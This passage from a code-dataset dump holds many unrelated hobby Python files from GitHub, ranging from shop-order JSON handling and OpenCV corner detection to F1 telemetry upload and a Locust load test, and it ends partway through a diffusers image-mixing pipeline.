if content[i][\"product_ID\"]==product_ID:\n \n try:\n a=content[i][detail_to_be_updated]\n except KeyError:\n return False\n \n content[i][detail_to_be_updated]=new_value\n f.seek(0)\n f.truncate()\n json.load(content,f)\n f.close()\n return True\n f.close()\n return False\n \n \ndef Delete_Product(product_json_file,product_ID):\n '''Deleting Product || Return True if successfully deleted else False'''\n \n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"product_ID\"]==product_ID:\n del content[i]\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n f.close()\n return True\n f.close()\n return 
False\n\ndef Update_Member(member_json_file,name,detail_to_be_updated,new_value):\n '''Updating Member Details || Return True if successfully updated else False'''\n f=open(member_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"name\"]==name:\n \n try:\n a=content[i][detail_to_be_updated]\n except KeyError:\n return False\n \n content[i][detail_to_be_updated]=new_value\n f.seek(0)\n f.truncate()\n json.load(content,f)\n f.close()\n return True\n f.close()\n return False\n \n \n \n\ndef Place_Order(order_json_file,ordered_by,delivery_address,product_json_file,product_ID,Quantity,Order_ID):\n '''Placing Order, Calculate the Price after discount and Total cost of the order || Return True if order placed successfully else False'''\n with open(product_json_file, 'r') as f:\n products = json.load(f)\n \n if product_ID not in products:\n print(f\"Product with ID {product_ID} does not exist.\")\n return False\n \n product = products[product_ID]\n price = product['price']\n discount = product['discount']\n discounted_price = price * (1 - discount/100)\n total_cost = discounted_price * Quantity\n \n order = {\n 'ordered_by': ordered_by,\n 'delivery_address': delivery_address,\n 'product_ID': product_ID,\n 'product_name': product['product_name'],\n 'quantity': Quantity,\n 'price': discounted_price,\n 'total_cost': total_cost\n }\n \n try:\n with open(order_json_file, 'r') as f:\n orders = json.load(f)\n except FileNotFoundError:\n orders = {}\n \n if Order_ID in orders:\n print(f\"Order with ID {Order_ID} already exists.\")\n orders[Order_ID] = order\n with open(order_json_file, 'w') as f:\n json.dump(orders, f, indent=4)\n return True\n \n\ndef Order_History(order_json_file,Name,details):\n '''Append the order information into details list'''\n try:\n with open(order_json_file, 'r') as f:\n orders = json.load(f)\n except FileNotFoundError:\n orders = {}\n for order_ID, order in orders.items():\n if order['ordered_by'] == Name:\n details.append(order)\n if len(details)>0:\n return True\n else:\n return False\n \n\n","repo_name":"MEKALAAKHILKUMAR/prject","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14417702474","text":"import cv2 as cv\r\nimport numpy as np\r\nfrom Feature import read\r\nimport copy\r\n\r\n\r\ndef Harris():\r\n name = 'Lena'\r\n pic = read.get_pics(0, name)\r\n print(pic.shape)\r\n # 求出x,y方向上的Ix,Iy矩阵图\r\n # 对于Sobel这里的trick,参照https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_gradients/py_gradients.html\r\n # 一定要用浮点形式做运算,后再求绝对值,再转换回uint8\r\n picx = cv.Sobel(pic, cv.CV_64F, 1, 0)\r\n picy = cv.Sobel(pic, cv.CV_64F, 0, 1)\r\n picx = np.abs(picx)\r\n picy = np.abs(picy)\r\n picx = np.uint8(picx)\r\n picy = np.uint8(picy)\r\n # 得到IxIx, IyIy 和 IxIy的矩阵图\r\n picxx = np.zeros(picx.shape, dtype=np.float32)\r\n picyy = np.zeros(picx.shape, dtype=np.float32)\r\n picxy = np.zeros(picx.shape, dtype=np.float32)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n picxx[i][j] = picx[i][j]**2\r\n picyy[i][j] = picy[i][j]**2\r\n picxy[i][j] = float(picx[i][j]) * float(picy[i][j])\r\n print(picxy.dtype)\r\n # 高斯模糊滤波,我认为是最重要的一步\r\n picxx = cv.GaussianBlur(picxx, (3, 3), 5)\r\n picyy = cv.GaussianBlur(picyy, (3, 3), 5)\r\n picxy = cv.GaussianBlur(picxy, (3, 3), 5)\r\n # 求R = det(M)-0.04*trace(M)^2, trace表示对角线的和,也是两个特征值的和\r\n # 
角点R是大正数,边缘是R大负数,平区域是|R|小\r\n R = np.zeros(picx.shape, dtype=np.float32)\r\n correspond = np.zeros(picx.shape, dtype=np.uint8)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n a = picxx[i][j]\r\n b = picyy[i][j]\r\n c = picxy[i][j]\r\n # 以下注释的是验证是否可以去掉det项,事实证明,如果不做高斯模糊项,\r\n # 是完全可以去掉的,但同时也就不会有角点检测出来了\r\n # v1 = (a*b - c*c)-0.04*(a+b)*(a+b)\r\n # v2 = - 0.04 * (a + b) * (a + b)\r\n # if v1 != v2:\r\n # print('a', a, 'b', b, 'c', c)\r\n # print('picx', picx[i][j], 'picy', picy[i][j])\r\n R[i][j] = (a*b - c*c)-0.04*(a+b)*(a+b)\r\n if R[i][j] > 1e+8:\r\n correspond[i][j] = 2 # 2表示角点\r\n elif R[i][j] < -1e+7:\r\n correspond[i][j] = 1 # 1表示边缘\r\n\r\n color_pic = read.get_pics(1, name)\r\n edge_color_pic = copy.copy(color_pic)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n if correspond[i][j] == 2:\r\n cv.circle(color_pic, (j, i), 1, (255, 255, 0))\r\n if correspond[i][j] == 1:\r\n cv.circle(edge_color_pic, (j, i), 1, (0, 0, 255))\r\n cv.imshow('coner', color_pic)\r\n cv.imshow('edge', edge_color_pic)\r\n\r\n # Shi-Tomasi Corner Detector\r\n # arg1:需要的角点数目\r\n # arg2:算法中lemda的最小阈值,两个lemda都大于它,就认为是角点,取值0-1\r\n # arg3:两个角点最小间隔\r\n # 若arg1给定数目小于利用lemda数值检测出的角点个数,第二个参数实际上是失效的\r\n corners = cv.goodFeaturesToTrack(pic, 100, 0.01, 10)\r\n corners = np.int16(corners) # corners输出来是浮点型的\r\n shi_pic = read.get_pics(1, name)\r\n for i in corners:\r\n x, y = i.ravel() # 因为很奇怪,corners的每个点输出格式为二维数组,即[[x, y]]\r\n cv.circle(shi_pic, (x, y), 3, (255, 0, 255), -1)\r\n cv.imshow('SHI', shi_pic)\r\n cv.waitKey(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n Harris()\r\n\r\n","repo_name":"AriaTZY/AR-transparent-driving","sub_path":"Feature/Harris.py","file_name":"Harris.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70543163123","text":"import json\nimport f1_2020_telemetry.types\n\nfrom receiver.session_base import SessionBase\nfrom receiver.f12020.api import F1LapsAPI\nfrom receiver.f12020.telemetry import Telemetry\nfrom lib.logger import log\n\n\nclass Session(SessionBase):\n \"\"\"\n Handles all session-specific variables and logic\n \"\"\"\n def __init__(self, session_uid):\n ###################################################\n # Attributes set on Session start\n ###################################################\n self.session_udp_uid = session_uid\n self.track_id = None\n self.session_type = None\n self.weather_ids = []\n self.f1laps_api_key = None\n self.telemetry_enabled = True\n self.is_online_game = False\n\n ###################################################\n # Attributes set with participants packet once\n ###################################################\n self.team_id = None\n\n ###################################################\n # Attributes set with each lap\n ###################################################\n self.lap_list = {}\n self.lap_number_current = None\n\n ###################################################\n # Attributes set with the setup package\n ###################################################\n self.setup = {}\n\n ###################################################\n # Attributes set with the telemetry package\n ###################################################\n self.telemetry = Telemetry()\n\n ###################################################\n # Attributes set with the final classification\n ###################################################\n self.finish_position = None\n self.result_status = None\n 
self.points = None\n\n ###################################################\n # Attributes set via F1Laps API\n ###################################################\n self.f1_laps_session_id = None\n\n def process_lap_in_f1laps(self, lap_number=None):\n \"\"\"\n Send Lap to F1Laps; either as a standalone lap or as a session lap,\n depending on game mode\n \"\"\"\n if self.session_type_supported_by_f1laps_as_session():\n # Create or update full Session object in F1Laps\n return self.create_or_update_session_in_f1laps()\n else:\n # Create only Lap object in F1Laps\n return self.create_lap_in_f1laps(lap_number)\n\n def create_lap_in_f1laps(self, lap_number):\n \"\"\" Send Lap to F1Laps \"\"\"\n response = F1LapsAPI(self.f1laps_api_key, \"f12020\").lap_create(\n track_id = self.track_id,\n team_id = self.team_id,\n conditions = self.map_weather_ids_to_f1laps_token(),\n game_mode = \"time_trial\", # hardcoded as the only supported value\n sector_1_time = self.lap_list[lap_number][\"sector_1_time_ms\"],\n sector_2_time = self.lap_list[lap_number][\"sector_2_time_ms\"],\n sector_3_time = self.lap_list[lap_number][\"sector_3_time_ms\"],\n setup_data = self.setup,\n is_valid = self.lap_list[lap_number].get(\"is_valid\", True),\n telemetry_data_string = self.get_lap_telemetry_data(lap_number)\n )\n if response and response.status_code == 201:\n log.info(\"Lap #%s successfully created in F1Laps\" % lap_number)\n return True\n else:\n log.error(\"Error creating lap %s in F1Laps\" % lap_number)\n log.error(\"F1Laps API response: %s\" % json.loads(response.content))\n return False\n\n def create_or_update_session_in_f1laps(self):\n log.info(\"Updating session (%s) in F1Laps\" % self.map_udp_session_id_to_f1laps_token())\n success,self.f1_laps_session_id = F1LapsAPI(self.f1laps_api_key, \"f12020\").session_create_or_update(\n f1laps_session_id = self.f1_laps_session_id,\n track_id = self.track_id,\n team_id = self.team_id,\n session_uid = self.session_udp_uid,\n conditions = self.map_weather_ids_to_f1laps_token(),\n session_type = self.map_udp_session_id_to_f1laps_token(),\n finish_position = self.finish_position,\n points = self.points,\n result_status = self.result_status, \n lap_times = self.get_f1laps_lap_times_list(),\n setup_data = self.setup,\n is_online_game = self.is_online_game\n )\n if success:\n log.info(\"Session (%s) successfully updated in F1Laps\" % self.map_udp_session_id_to_f1laps_token())\n return True\n else:\n log.info(\"Session not updated in F1Laps\")\n return False\n\n def map_udp_session_id_to_f1laps_token(self):\n session_mapping = {\n 1: \"practice_1\",\n 2: \"practice_2\",\n 3: \"practice_3\",\n 4: \"practice_1\", # short practice\n 5: \"qualifying_1\", # q1\n 6: \"qualifying_2\", # q2\n 7: \"qualifying_3\", # q3\n 8: \"qualifying\", # short q\n 9: \"qualifying\", # osq\n 10: \"race\",\n 11: \"race\",\n 12: \"time_trial\",\n }\n return session_mapping.get(self.session_type)\n\n def session_type_supported_by_f1laps_as_session(self):\n return True if self.session_type and self.session_type != 12 else False\n\n def get_f1laps_lap_times_list(self):\n lap_times = []\n for lap_number, lap_object in self.lap_list.items():\n if lap_object['sector_1_time_ms'] and lap_object['sector_2_time_ms'] and lap_object['sector_3_time_ms']:\n lap_times.append({\n \"lap_number\" : lap_number,\n \"sector_1_time_ms\" : lap_object['sector_1_time_ms'],\n \"sector_2_time_ms\" : lap_object['sector_2_time_ms'],\n \"sector_3_time_ms\" : lap_object['sector_3_time_ms'],\n \"car_race_position\" : 
lap_object['car_race_position'],\n \"pit_status\" : lap_object['pit_status'],\n \"tyre_compound_visual\" : lap_object.get('tyre_compound_visual'),\n \"telemetry_data_string\": self.get_lap_telemetry_data(lap_number)\n })\n return lap_times\n\n def get_track_name(self):\n return f1_2020_telemetry.types.TrackIDs.get(self.track_id)\n\n\n","repo_name":"f1laps/f1laps-telemetry","sub_path":"receiver/f12020/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"7857037409","text":"from vezba3_Geometrija import Tacka, Duz\n\ndef kreirajDuz(xt1, yt1, xt2, yt2):\n p = Tacka(xt1, yt1)\n k = Tacka(xt2, yt2)\n d = Duz(p, k)\n return d\n\ndef isFloat(n):\n try:\n float(n)\n return True\n except ValueError:\n return False\n\nduzi = []\nt1 = 0\nt2 = 0\np = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\nwhile True==True:\n if len(p.split(\",\"))==2:\n px = p.split(\",\")[0]\n py = p.split(\",\")[1]\n if isFloat(px) and isFloat(py) == True:\n t1 = Tacka(float(px), float(py))\n break\n else:\n p = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\n else:\n p = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\nk = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\nwhile True==True:\n if len(k.split(\",\"))==2:\n kx = k.split(\",\")[0]\n ky = k.split(\",\")[1]\n if isFloat(kx) and isFloat(ky) == True:\n t2 = Tacka(float(kx), float(ky))\n break\n else:\n k = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\n else:\n k = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\n\nduz1 = Duz(t1,t2)\nduzi.append(duz1)\n\nduz2 = 0\nt = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\nwhile True==True:\n if len(t.split(\",\"))==4:\n px, py, kx, ky = t.split(\",\")[0], t.split(\",\")[1], t.split(\",\")[2], t.split(\",\")[3]\n if isFloat(px) and isFloat(py) and isFloat(kx) and isFloat(ky) == True:\n duz2 = kreirajDuz(float(px),float(py),float(kx),float(ky))\n break\n else:\n t = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\n else:\n t = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\nprint(\"-----\")\nduzi.append(duz2)\nfor d in duzi:\n d.duzInfo()\n\ndxk = input(\"Unesi vrednost za koju zelis izmeniti x koordinatu krajnje tacke prve duzi (dx):\")\ndyk = input(\"Unesi vrednost za koju zelis izmeniti y koordinatu krajnje tacke prve duzi (dy):\")\nwhile True == True:\n if isFloat(dxk) and isFloat(dyk):\n dxk = float(dxk)\n dyk = float(dyk)\n break\n else:\n dxk = input(\"Unesi vrednost za koju zelis izmeniti x koordinatu krajnje tacke (dx):\")\n dyk = input(\"Unesi vrednost za koju zelis izmeniti y koordinatu krajnje tacke (dy):\")\n\nduz1.t_krajnja.x_pomeraj(duz1.t_krajnja.x+dxk)\nduz1.t_krajnja.y_pomeraj(duz1.t_krajnja.y+dyk)\nprint(\"-----\")\nfor d in duzi:\n d.duzInfo()","repo_name":"StefanStamenkovic/Git","sub_path":"vezba3_Geometrija_test.py","file_name":"vezba3_Geometrija_test.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"75326620083","text":"#Importing the libraries\nimport cv2\n#Reading image using opencv\ni=cv2.imread('face.jpeg')\n#Printing shape of image\nprint(i.shape)\n#Printing the stored image array\nprint(i)\n#Converting to grayscale\ni_gray=cv2.imread('face.jpeg',0)\n#Selecting region 
in the image\nr=cv2.selectROI(i)\n#Displaying the selected area\nprint(r)\n#Changing colour of selected region to red\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],0]=0\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],1]=0\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],2]=255\n#Displaying the output\ncv2.imshow(i)\ncv2.waitkey(0)\n#Replacing ROI with an image\nk=cv2.imread('spongebob.jpg')\n#Pasting new image in ROI by resizing it\nk1=cv2.resize(k,(r[2],r[3]))\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2]]=k1\ncv2.imshow(\"Modified image\",i)\ncv2.waitkey(0)\n","repo_name":"Tanishasharma11/Image-Processing","sub_path":"Making_spongebob_filter.py","file_name":"Making_spongebob_filter.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22611232652","text":"import logging.config\n\nfrom django.core.management.base import BaseCommand\n\nfrom crawler.models import *\n\nlogger = logging.getLogger('crawler.command')\n\n\nclass Command(BaseCommand):\n help = 'Generate comparison between google similar app and ours'\n\n def handle(self, *args, **options):\n compatibility_count = 0\n similar_apps = SimilarApp.objects.filter().all()\n for similar_app in similar_apps:\n if self.is_compatible_with_google(similar_app):\n compatibility_count = compatibility_count + 1\n\n admin_file = open('comparison.csv', 'w')\n admin_file.write('{};{}\\n'.format('Percentage of Compatibility', 'Total Similarity'))\n admin_file.write('{};{}\\n'.format(float(compatibility_count) / len(similar_apps), len(similar_apps)))\n admin_file.close()\n self.stdout.write(self.style.SUCCESS(\n 'Compatible Count: {} - Similar Count: {}'.format(compatibility_count, len(similar_apps))))\n\n @staticmethod\n def is_compatible_with_google(similar_app):\n count = GoogleSimilarApp.objects.filter(\n source_package=similar_app.source_package,\n similar_package=similar_app.similar_package\n ).count()\n\n if count > 0:\n return True\n\n count = GoogleSimilarApp.objects.filter(\n source_package=similar_app.similar_package,\n similar_package=similar_app.source_package\n ).count()\n\n if count > 0:\n return True\n\n return False\n","repo_name":"bkosawa/admin-recommendation","sub_path":"crawler/management/commands/compare_my_similar_with_google_similar.py","file_name":"compare_my_similar_with_google_similar.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29236417513","text":"# https://www.acmicpc.net/problem/1238\n# 파티\n# 다익스트라\nfrom collections import *\nimport heapq as H, sys\nR=range\nI=lambda:map(int,sys.stdin.readline().split())\ng=defaultdict(dict)\nn,m,x=I();n+=1\nfor _ in R(m):s,e,t=I();g[s][e]=t\ndef D(s):\n q=[];d=[1e6]*n;H.heappush(q,(0,s));d[0]=0;d[s]=0\n while q:\n c,s=H.heappop(q)\n if d[s]x:d[e]=x;H.heappush(q,(x,e))\n return d\nr=D(x)\nfor i in R(1,n):r[i]+=D(i)[x]\nprint(max(r))\n\n# 접근 1) X를 제외한 도시 -> X 시간 + X -> 도시 복귀 시간 중 최대값 찾기 \n# 최대 시간: 100*1000이므로 대충 1e6\n","repo_name":"StaySharp0/algorithm","sub_path":"dijkstra/1238.py","file_name":"1238.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70779300721","text":"\ndef bubble_sort1(A):\n for i in range(0, len(A) - 1):\n done = True\n for j in range(0, len(A) - i - 1):\n if A[j] > A[j + 1]:\n A[j], A[j + 1] = A[j + 1], A[j]\n done = False\n if done:\n return\n\n\nA = [5, 9, 1, 2, 4, 8, 6, 3, 
7]\nprint(A)\nbubble_sort1(A)\n","repo_name":"HamdiKaptan/Python_Search_and_Sort","sub_path":"funcs/buble_sort.py","file_name":"buble_sort.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14289090880","text":"from selenium import webdriver\r\nimport pytest\r\nfrom locators import MAIN_PAGE_URL\r\n\r\n\r\n@pytest.fixture(scope=\"function\")\r\ndef chrome_drv():\r\n global driver\r\n driver = webdriver.Chrome(executable_path=r\"C:/Users/Oks_Sunshine/Downloads/chromedriver_win32/chromedriver.exe\")\r\n driver.maximize_window() # maximize the page\r\n driver.implicitly_wait(30)\r\n\r\n\r\ndef srart_page(chrome_drv):\r\n driver.get(MAIN_PAGE_URL)\r\n\r\n\r\n","repo_name":"EvgeniySalar/booking_test","sub_path":"book/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37826521011","text":"# -*- coding: utf-8 -*-\r\nimport os, sys\r\n\r\n\r\nimport numpy as np\r\nfrom matplotlib.pyplot import *\r\nimport load_ene as ee\r\ndata = np.load('ENE_data.npy')\r\n#date,time,_=ee.load_data()\r\nX = data[:,7]\r\nX = X[::47]\r\nC = X\r\nfor i in range(4):\r\n X = np.append(X,C)\r\nmatplotlib.rcParams.update({'font.size': 16})\r\n\r\nsubplot(1,1,1)\r\nylabel(u'Spotřeba energie [kW]')\r\nxlabel('Vzorky[15 min.]')\r\nplot(X,'k',linewidth=0.5)\r\nshow()\r\n","repo_name":"marfay/Polynomial-Neural-Networks-D.Thesis-2017-","sub_path":"App for NN tunning and forecasting/day_examination.py","file_name":"day_examination.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21365173616","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 1 12:09:02 2021\n\n@author: alexander\n\"\"\"\nimport requests\n#from bs4 import BeautifulSoup\nimport os\n\ndef downLoadImg(urlp,nompost, x, fileDownland):\n Image = fileDownland\n img = nompost\n filePath = Image # file path for the directory\n originPath = os.getcwd()\n # create directory for required images poster\n if not os.path.exists(filePath): # if the dir doesn't exist\n os.makedirs(filePath) # create the dir\n \n # move to new directory\n os.chdir(filePath)\n pathFinish = os.getcwd()\n try:\n url = urlp\n response = requests.get(url) # go to the url and store it in the response var\n if response.status_code == 200:\n nameFilepath = img + '-' + str(x) + '.jpg' \n with open(nameFilepath, 'wb') as f: # open the image as the mentioned file format, (w for writing, and b for binary)\n print(response)\n f.write(requests.get(url).content) # get the content of the url and write/save in the created dir\n f.close() # stop writing/saving the image\n pathFinish += \"/\" + nameFilepath\n except:\n print('Image not found')\n pass # repeat the loop again \n os.chdir(originPath)\n print(pathFinish)\n return pathFinish\n#-----------------------------------------------------------------\n\n# url = \"https://pelisplus.me/pelicula/life-in-a-year/\"\n# page = requests.get(url)\n# soup = BeautifulSoup(page.content,'html.parser')\n\n# poster = soup.find('img',{'id':'cover'})['src']\n# print(downLoadImg(poster, 
'life-in-a-year',1,'poster'))\n","repo_name":"alexanderJPV/webScarping_BeautifulSoup","sub_path":"examples/pelisPlus/scrapMovie.py","file_name":"scrapMovie.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43126151806","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport mmap\nimport optparse\nimport os\nimport sys\nimport time\n\nimport starbound\n\n\ndef main():\n p = optparse.OptionParser('Usage: %prog ')\n p.add_option('-d', '--destination', dest='path',\n help='Destination directory')\n options, arguments = p.parse_args()\n # Validate the arguments.\n if len(arguments) != 1:\n p.error('Only one argument is supported (package path)')\n package_path = arguments[0]\n base = options.path if options.path else '.'\n # Load the assets file and its index.\n start = time.clock()\n with open(package_path, 'rb') as fh:\n mm = mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ)\n package = starbound.SBAsset6(mm)\n print('Loading index...')\n # Get the paths from the index in the database.\n package.read_index()\n print('Index loaded. Extracting {} files...'.format(package.file_count))\n # Start extracting everything.\n num_files = 0\n percentage_count = max(package.file_count // 100, 1)\n for path in package.index:\n dest_path = base + path\n dir_path = os.path.dirname(dest_path)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n try:\n data = package.get(path)\n except:\n # Break the dots in case std{out,err} are the same tty:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n print >>sys.stderr, 'W: Failed to read', path\n continue\n with open(dest_path, 'wb') as file:\n file.write(data)\n num_files += 1\n if not num_files % percentage_count:\n sys.stdout.write('.')\n sys.stdout.flush()\n elapsed = time.clock() - start\n print('')\n print('Extracted {} files in {:.1f} seconds.'.format(num_files, elapsed))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"blixt/py-starbound","sub_path":"starbound/cliexport.py","file_name":"cliexport.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"75"} +{"seq_id":"36806575163","text":"from locust import HttpLocust, TaskSet, task\n\n\nclass UserBehavior(TaskSet):\n token = None\n def on_start(self):\n self.getPhotoById()\n\n\n\n @task(1)\n def getPhotoById(self):\n params = {\n \"id\": 1\n }\n self.client.get(\"/GetPhoto\", params = params)\n\nclass WebsiteUser(HttpLocust):\n host = 'http://localhost:4200'\n\n task_set = UserBehavior\n min_wait = 5000\n max_wait = 9000\n","repo_name":"yueyue200830/MeetHere","sub_path":"performance test/Independent Test/Independent Test1.py","file_name":"Independent Test1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17899243044","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport phd.viz\nimport phd.thermo\ncolors, palette = phd.viz.phd_style()\n\n# Define a concentration range\nc_range = np.logspace(-2, 4, 200)\npact = phd.thermo.MWC(ka=200, ki=1, ep_ai=5, effector_conc=c_range).pact()\n\n# %%\nfig, ax = plt.subplots(1, 1, figsize=(3, 2))\nphd.viz.despine(ax)\nax.set_xscale('log')\nax.plot(c_range, pact, '-', color=colors['blue'], lw=1)\nax.set_xlabel('inducer concentration')\nax.set_ylabel('probability of being active')\nax.set_ylim([0, 
1.1])\nax.set_xticklabels([])\nplt.savefig('../figs/fig3_plot.svg', bbox_inches='tight')\n# %%\n","repo_name":"gchure/phd","sub_path":"src/chapter_01/code/ch1_fig3.py","file_name":"ch1_fig3.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"24246147396","text":"from typing import Any, Callable, Dict, List, Optional, Union\n\nimport numpy as np\nimport PIL\nimport torch\nfrom diffusers import StableDiffusionImg2ImgPipeline\nfrom diffusers.pipelines.stable_diffusion import StableDiffusionPipelineOutput\nfrom diffusers.utils import deprecate, randn_tensor\n\n\nclass MagicMixStableDiffusionImg2ImgPipeline(StableDiffusionImg2ImgPipeline):\n def prepare_latents(\n self,\n image,\n timestep,\n batch_size,\n num_images_per_prompt,\n dtype,\n device,\n generator=None,\n ):\n if not isinstance(image, (torch.Tensor, PIL.Image.Image, list)):\n raise ValueError(\n f\"`image` has to be of type `torch.Tensor`, `PIL.Image.Image` or list but is {type(image)}\"\n )\n\n image = image.to(device=device, dtype=dtype)\n\n batch_size = batch_size * num_images_per_prompt\n\n if image.shape[1] == 4:\n init_latents = image\n\n else:\n if isinstance(generator, list) and len(generator) != batch_size:\n raise ValueError(\n f\"You have passed a list of generators of length {len(generator)}, but requested an effective batch\"\n f\" size of {batch_size}. Make sure the batch size matches the length of the generators.\"\n )\n\n elif isinstance(generator, list):\n init_latents = [\n self.vae.encode(image[i : i + 1]).latent_dist.sample(generator[i])\n for i in range(batch_size)\n ]\n init_latents = torch.cat(init_latents, dim=0)\n else:\n init_latents = self.vae.encode(image).latent_dist.sample(generator)\n\n init_latents = self.vae.config.scaling_factor * init_latents\n\n if (\n batch_size > init_latents.shape[0]\n and batch_size % init_latents.shape[0] == 0\n ):\n # expand init_latents for batch_size\n deprecation_message = (\n f\"You have passed {batch_size} text prompts (`prompt`), but only {init_latents.shape[0]} initial\"\n \" images (`image`). Initial images are now duplicating to match the number of text prompts. Note\"\n \" that this behavior is deprecated and will be removed in a version 1.0.0. 
Please make sure to update\"\n \" your script to pass as many initial images as text prompts to suppress this warning.\"\n )\n deprecate(\n \"len(prompt) != len(image)\",\n \"1.0.0\",\n deprecation_message,\n standard_warn=False,\n )\n additional_image_per_prompt = batch_size // init_latents.shape[0]\n init_latents = torch.cat(\n [init_latents] * additional_image_per_prompt, dim=0\n )\n elif (\n batch_size > init_latents.shape[0]\n and batch_size % init_latents.shape[0] != 0\n ):\n raise ValueError(\n f\"Cannot duplicate `image` of batch size {init_latents.shape[0]} to {batch_size} text prompts.\"\n )\n else:\n init_latents = torch.cat([init_latents], dim=0)\n\n shape = init_latents.shape\n noise = randn_tensor(shape, generator=generator, device=device, dtype=dtype)\n\n # get latents\n image_latents = init_latents\n init_latents = self.scheduler.add_noise(init_latents, noise, timestep)\n\n latents = init_latents\n\n return latents, image_latents, noise\n\n def get_timesteps(self, num_inference_steps, k_max, device):\n # get the original timestep using init_timestep\n init_timestep = min(int(num_inference_steps * k_max), num_inference_steps)\n\n t_start = max(num_inference_steps - init_timestep, 0)\n timesteps = self.scheduler.timesteps[t_start * self.scheduler.order :]\n\n return timesteps, num_inference_steps - t_start\n\n @torch.no_grad()\n def __call__(\n self,\n prompt: Union[str, List[str]] = \"\",\n image: Union[\n torch.FloatTensor,\n PIL.Image.Image,\n np.ndarray,\n List[torch.FloatTensor],\n List[PIL.Image.Image],\n List[np.ndarray],\n ] = None,\n num_inference_steps: Optional[int] = 50,\n guidance_scale: Optional[float] = 7.5,\n negative_prompt: Optional[Union[str, List[str]]] = None,\n num_images_per_prompt: Optional[int] = 1,\n eta: Optional[float] = 0.0,\n generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n output_type: Optional[str] = \"pil\",\n return_dict: bool = True,\n callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n callback_steps: int = 1,\n cross_attention_kwargs: Optional[Dict[str, Any]] = None,\n k_min: float = 0.3, # float between 0 and 1, k_max to k_min is the mixing of the two semantics\n k_max: float = 0.6, # float between 0 and 1, k_min < k_max, iterations to get layout of the image\n v: float = 0.5, # float between 0 and 1, mix factor\n ):\n # 1. Check inputs. Raise error if not correct\n self.check_inputs(\n prompt,\n 1.0,\n callback_steps,\n negative_prompt,\n prompt_embeds,\n negative_prompt_embeds,\n )\n\n # 2. Define call parameters\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n device = self._execution_device\n # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)\n # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`\n # corresponds to doing no classifier free guidance.\n if guidance_scale is not None and guidance_scale > 1.0:\n 